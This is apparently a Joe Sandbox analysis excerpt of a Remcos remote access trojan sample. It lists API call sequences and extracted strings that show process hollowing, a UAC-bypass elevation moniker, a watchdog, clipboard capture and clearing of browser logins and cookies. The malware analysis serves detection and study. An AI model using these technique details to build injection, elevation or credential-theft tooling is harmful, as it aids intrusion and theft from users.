                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                                • CloseHandle.KERNEL32 ref: 00405A23
                                                                                                • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                                • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                                • CloseHandle.KERNEL32 ref: 00405A45
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                • String ID: lG$ lG$ lG$ lG$ lG$SystemDrive$cmd.exe
                                                                                                • API String ID: 2994406822-4099966829
                                                                                                • Opcode ID: d03cecef8ac8c825a180516c4d22f2b09528c3df341169639ad36729b41b3966
                                                                                                • Instruction ID: de4e4ebcbe15d3830e6e521ad2e1eecf7f6dbcbc683575455a8755bc669fea45
                                                                                                • Opcode Fuzzy Hash: d03cecef8ac8c825a180516c4d22f2b09528c3df341169639ad36729b41b3966
                                                                                                • Instruction Fuzzy Hash: 1B91E471604604AFD711BB25ED42A6F3A9AEB80348F01443FF549A72E2DF7D5C488B5D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00412054
                                                                                                  • Part of subcall function 004137C5: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 004137D3
                                                                                                  • Part of subcall function 004137C5: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C0A0,00466C48,00000001,000000AF,004660A4), ref: 004137EE
                                                                                                  • Part of subcall function 004137C5: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C0A0,00466C48,00000001,000000AF,004660A4), ref: 004137F9
                                                                                                • OpenMutexA.KERNEL32 ref: 00412094
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004120A3
                                                                                                • CreateThread.KERNEL32(00000000,00000000,0041273C,00000000,00000000,00000000), ref: 004120F9
                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412368
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$C}w
                                                                                                • API String ID: 3018269243-1860860081
                                                                                                • Opcode ID: 4bcd0f219016ec97be1e9d939f8da0c10b526a52679b03460c5426fc19120eff
                                                                                                • Instruction ID: 0d13d43ad637dff1fe81996a96760afe0bf10590795afb9f1943340568bde94f
                                                                                                • Opcode Fuzzy Hash: 4bcd0f219016ec97be1e9d939f8da0c10b526a52679b03460c5426fc19120eff
                                                                                                • Instruction Fuzzy Hash: 2071A03160430167C218FB72DD5B9AE77A4AF94708F40057FB586A20E2FFBC9949C69A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 00CB34DC
                                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,00000000), ref: 00CB3535
                                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,?,00000000), ref: 00CB354E
                                                                                                • GetThreadContext.KERNEL32(?,00000000,?,?,00000000), ref: 00CB3563
                                                                                                • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000,?,?,00000000), ref: 00CB3581
                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,00000000), ref: 00CB3599
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00CB35A0
                                                                                                • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,00000000), ref: 00CB35BF
                                                                                                • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,00000000), ref: 00CB35DA
                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 00CB360C
                                                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,?,00000000), ref: 00CB363C
                                                                                                • SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,?,00000000), ref: 00CB3652
                                                                                                • ResumeThread.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 00CB365B
                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 00CB3669
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$Memory$ThreadVirtualWrite$AllocContextModule$AddressCreateFileFreeHandleNameProcReadResume
                                                                                                • String ID: $NtUnmapViewOfSection$ntdll.dll
                                                                                                • API String ID: 4232606500-1522589568
                                                                                                • Opcode ID: 7f48af93f937722a396c37bd44b4161abe34d2f4b8235abd4b0f73aaf5fcfd30
                                                                                                • Instruction ID: 4aa36f2e826f87d522b0994316bb796f8dd00e030d03c4893d2fd3f3a67da2e9
                                                                                                • Opcode Fuzzy Hash: 7f48af93f937722a396c37bd44b4161abe34d2f4b8235abd4b0f73aaf5fcfd30
                                                                                                • Instruction Fuzzy Hash: 2F513771A40209BFEB109FA4DC85FEEBBB8BF08700F504026F615EA290D7B5AA55CB55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BAFD
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040BB17
                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BC3A
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040BC60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                • API String ID: 1164774033-3681987949
                                                                                                • Opcode ID: b7ff0b334e66b397f6b5f2ce9c9ac90d4baeb29ca37303a0e564a64990128067
                                                                                                • Instruction ID: 0c444b27639c9c5018b15d678d008ce1e60e4a17353ccb3dd71c17b9335bc626
                                                                                                • Opcode Fuzzy Hash: b7ff0b334e66b397f6b5f2ce9c9ac90d4baeb29ca37303a0e564a64990128067
                                                                                                • Instruction Fuzzy Hash: 11515D3190421A9ADB14F7A2DC56DEEB739AF11304F50057FF406760E2EF785A89CA8D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 00416810
                                                                                                • EmptyClipboard.USER32 ref: 0041681E
                                                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041683E
                                                                                                • GlobalLock.KERNEL32 ref: 00416847
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0041687D
                                                                                                • SetClipboardData.USER32 ref: 00416886
                                                                                                • CloseClipboard.USER32 ref: 004168A3
                                                                                                • OpenClipboard.USER32 ref: 004168AA
                                                                                                • GetClipboardData.USER32 ref: 004168BA
                                                                                                • GlobalLock.KERNEL32 ref: 004168C3
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004168CC
                                                                                                • CloseClipboard.USER32 ref: 004168D2
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                • String ID: !D@
                                                                                                • API String ID: 3520204547-604454484
                                                                                                • Opcode ID: 8c013e8972fe646e1b2dbd5ab0b8c4f959906cf82b6a63c4f40e0e46a0422db7
                                                                                                • Instruction ID: 0fc0cf295518fbfb68c3eb210c1eb1d2336127672aab31fcd858d8c2724b716e
                                                                                                • Opcode Fuzzy Hash: 8c013e8972fe646e1b2dbd5ab0b8c4f959906cf82b6a63c4f40e0e46a0422db7
                                                                                                • Instruction Fuzzy Hash: 8D215171204301EBD714BBB1DC5D9BE36A9AF88742F40043EF946961E2EF38CC05C66A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BCFD
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040BD17
                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BDD7
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040BDFD
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040BE1E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$Close$File$FirstNext
                                                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                • API String ID: 3527384056-432212279
                                                                                                • Opcode ID: 18c6914aedbf4db8a083bc69dad6fea508443dcb85a011d8fffe1fc42ea87272
                                                                                                • Instruction ID: 32b23487147a816041c30da2224dce557673570347bddc60567f1f366ddad262
                                                                                                • Opcode Fuzzy Hash: 18c6914aedbf4db8a083bc69dad6fea508443dcb85a011d8fffe1fc42ea87272
                                                                                                • Instruction Fuzzy Hash: 28417F3190021AAADB04FBA6DC569EEB768AF11704F50057FF506B20D2FF3C5A49CA9D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F3DC
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F407
                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F423
                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F4A2
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F4B1
                                                                                                  • Part of subcall function 0041C12B: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C143
                                                                                                  • Part of subcall function 0041C12B: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C156
                                                                                                • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F5BC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                                • API String ID: 3756808967-1743721670
                                                                                                • Opcode ID: 149f83f78c0dcefb94a93c5616230e5a81f93e49b46487426d8ad3e4f4ac1731
                                                                                                • Instruction ID: 5018d2d9c90dbd6d6fe108ccdeab389871d3560f6d607c0aa7ec0a5772391e24
                                                                                                • Opcode Fuzzy Hash: 149f83f78c0dcefb94a93c5616230e5a81f93e49b46487426d8ad3e4f4ac1731
                                                                                                • Instruction Fuzzy Hash: B7714E705083429BC724EB21D8919AEB7A4AF94348F40483FF586631E3EF7C994DCB5A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                                • API String ID: 0-1861860590
                                                                                                • Opcode ID: 13c334033b35c610f53346a6141b88d5a34a173366e14a26250f9f9a851070ab
                                                                                                • Instruction ID: 9e09b7185deedc0a3188928efce079fdeb8dc50ce9f7ebeb8d7f12ba87488783
                                                                                                • Opcode Fuzzy Hash: 13c334033b35c610f53346a6141b88d5a34a173366e14a26250f9f9a851070ab
                                                                                                • Instruction Fuzzy Hash: C071C2709183019FD704EF21D8A2BEB7794AF45310F10491EF5A26B2D1DE78AB49CB97
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 00407521
                                                                                                • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Object_wcslen
                                                                                                • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                • API String ID: 240030777-3166923314
                                                                                                • Opcode ID: 76d15d0fb56d7a8d8e1e460f28c31beb9cf9d21763891b71753c9d2bdaa02437
                                                                                                • Instruction ID: 08efd04b626cbfc978d5ebff47a7608052b1d371e0bd854913493cebd1a15ee8
                                                                                                • Opcode Fuzzy Hash: 76d15d0fb56d7a8d8e1e460f28c31beb9cf9d21763891b71753c9d2bdaa02437
                                                                                                • Instruction Fuzzy Hash: AB117372D04218BAD710E6959C46BDEB7BC9B08714F25007BF904B3382E77CAA4486BF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A6AC
                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A6FB
                                                                                                • GetLastError.KERNEL32 ref: 0041A709
                                                                                                • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A741
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                • String ID:
                                                                                                • API String ID: 3587775597-0
                                                                                                • Opcode ID: 9429da188829ae0cc58a5dfaa5129494b7d068c4fc29835a0ae44944b6b66758
                                                                                                • Instruction ID: 98f091b54933f8dc116b4dcc422d911b8a3664dfb3dab3f2e6005b1ed7f3cac0
                                                                                                • Opcode Fuzzy Hash: 9429da188829ae0cc58a5dfaa5129494b7d068c4fc29835a0ae44944b6b66758
                                                                                                • Instruction Fuzzy Hash: 49817471104301ABC314EF61D885DAFB7A8FF94709F50082EF185521A2EF78EE48CB9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C2E9
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040C3BC
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040C3CB
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040C3F6
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$CloseFile$FirstNext
                                                                                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                • API String ID: 1164774033-405221262
                                                                                                • Opcode ID: 7b3dbf79728eeffbde2c82012aaf771e0194470edd515b0a4a403a1f858b0f8c
                                                                                                • Instruction ID: fef4d65b9f20089db2f88367438c0b90451e8f61a7647c86833f6491ac69dca9
                                                                                                • Opcode Fuzzy Hash: 7b3dbf79728eeffbde2c82012aaf771e0194470edd515b0a4a403a1f858b0f8c
                                                                                                • Instruction Fuzzy Hash: DD315E3190021AAACB14F7A1DC9ADAE7778AF10718F10017FF506B20D2FF78994ACA5D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C23A
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C26A
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2DC
                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2E9
                                                                                                  • Part of subcall function 0041C1DF: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2BF
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C30A
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C320
                                                                                                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C327
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C330
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                • String ID:
                                                                                                • API String ID: 2341273852-0
                                                                                                • Opcode ID: 571a63e77e9d579d1df3fcb8ff562e8e9559788ee97b6b046b3cc0c74534924d
                                                                                                • Instruction ID: 658f290bacfa54b2639a90bd0fd1c4fed19c92f365caa476b4101e6107ecc85f
                                                                                                • Opcode Fuzzy Hash: 571a63e77e9d579d1df3fcb8ff562e8e9559788ee97b6b046b3cc0c74534924d
                                                                                                • Instruction Fuzzy Hash: 0731827284421CAADB20E7A1DC89EDB737CAF09305F5405FBF555D2052EB399EC88A58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00419C99
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419D65
                                                                                                  • Part of subcall function 0041C3D3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A791), ref: 0041C3EC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Find$CreateFirstNext
                                                                                                • String ID: 8SG$PXG$PXG$NG$PG
                                                                                                • API String ID: 341183262-3812160132
                                                                                                • Opcode ID: 505acaa33e9fd67565e545479f01f95fc05fc55d6017b708142bc93f10909bb5
                                                                                                • Instruction ID: 244e5bd26970ee64e0f805b201a5ce69ae47f76faa5f1ec663fe2ae2e6e217cd
                                                                                                • Opcode Fuzzy Hash: 505acaa33e9fd67565e545479f01f95fc05fc55d6017b708142bc93f10909bb5
                                                                                                • Instruction Fuzzy Hash: F08175315082419BC314FB22DC56EEF73A9AF90344F40493FF546671E2EF789949C69A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00413FEB
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00413FF7
                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004141B8
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004141BF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                • API String ID: 2127411465-314212984
                                                                                                • Opcode ID: e63698ce317ceb4c4f851f637af5a7ea9b37e636c7e6601b3bec646b2a3448e3
                                                                                                • Instruction ID: 641828d4a39e843f2430769769f5c1217e4fdfd89ddfed3c8fa3b4965f6deed4
                                                                                                • Opcode Fuzzy Hash: e63698ce317ceb4c4f851f637af5a7ea9b37e636c7e6601b3bec646b2a3448e3
                                                                                                • Instruction Fuzzy Hash: 8EB10672A0430066C614BB76CD579EE36A85FD1748F40053FF902B71E2EE7C9A4886DE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004178A0: GetCurrentProcess.KERNEL32(00000028,?), ref: 004178AD
                                                                                                  • Part of subcall function 004178A0: OpenProcessToken.ADVAPI32(00000000), ref: 004178B4
                                                                                                  • Part of subcall function 004178A0: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004178C6
                                                                                                  • Part of subcall function 004178A0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004178E5
                                                                                                  • Part of subcall function 004178A0: GetLastError.KERNEL32 ref: 004178EB
                                                                                                • ExitWindowsEx.USER32 ref: 004167A4
                                                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004167B9
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004167C0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                • API String ID: 1589313981-2876530381
                                                                                                • Opcode ID: 9fcdfdf2e70f192820140de20959d418043f044d0dc70dfb4a0c18ce04bd27c8
                                                                                                • Instruction ID: f6c6f585a36de8121c5df69adef47d76b6904e2c2d247bbf37b4588cde2b2bc5
                                                                                                • Opcode Fuzzy Hash: 9fcdfdf2e70f192820140de20959d418043f044d0dc70dfb4a0c18ce04bd27c8
                                                                                                • Instruction Fuzzy Hash: 87216FB060430156CE14FBB28896ABF72599F41788F41483FB542AB2D2EF3CD845CB6E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B99C
                                                                                                • GetLastError.KERNEL32 ref: 0040B9A6
                                                                                                Strings
                                                                                                • UserProfile, xrefs: 0040B96C
                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B967
                                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040B9CC
                                                                                                • [Chrome StoredLogins not found], xrefs: 0040B9C0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteErrorFileLast
                                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                • API String ID: 2018770650-1062637481
                                                                                                • Opcode ID: b827c5fc418e544337e776d4383bf840cd7da94323f47ab98b09c0da0df255b3
                                                                                                • Instruction ID: eb8c66327cbd9852b634475a7665cab754f13b7e32d1a4412a60f723b3e04143
                                                                                                • Opcode Fuzzy Hash: b827c5fc418e544337e776d4383bf840cd7da94323f47ab98b09c0da0df255b3
                                                                                                • Instruction Fuzzy Hash: 83018FB1A401056ACA047BB6DD5B9BE7728E911704F50027BF902722E2FE7D49098ADE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004178AD
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004178B4
                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004178C6
                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004178E5
                                                                                                • GetLastError.KERNEL32 ref: 004178EB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                • String ID: SeShutdownPrivilege
                                                                                                • API String ID: 3534403312-3733053543
                                                                                                • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                                                • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                                                                                • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
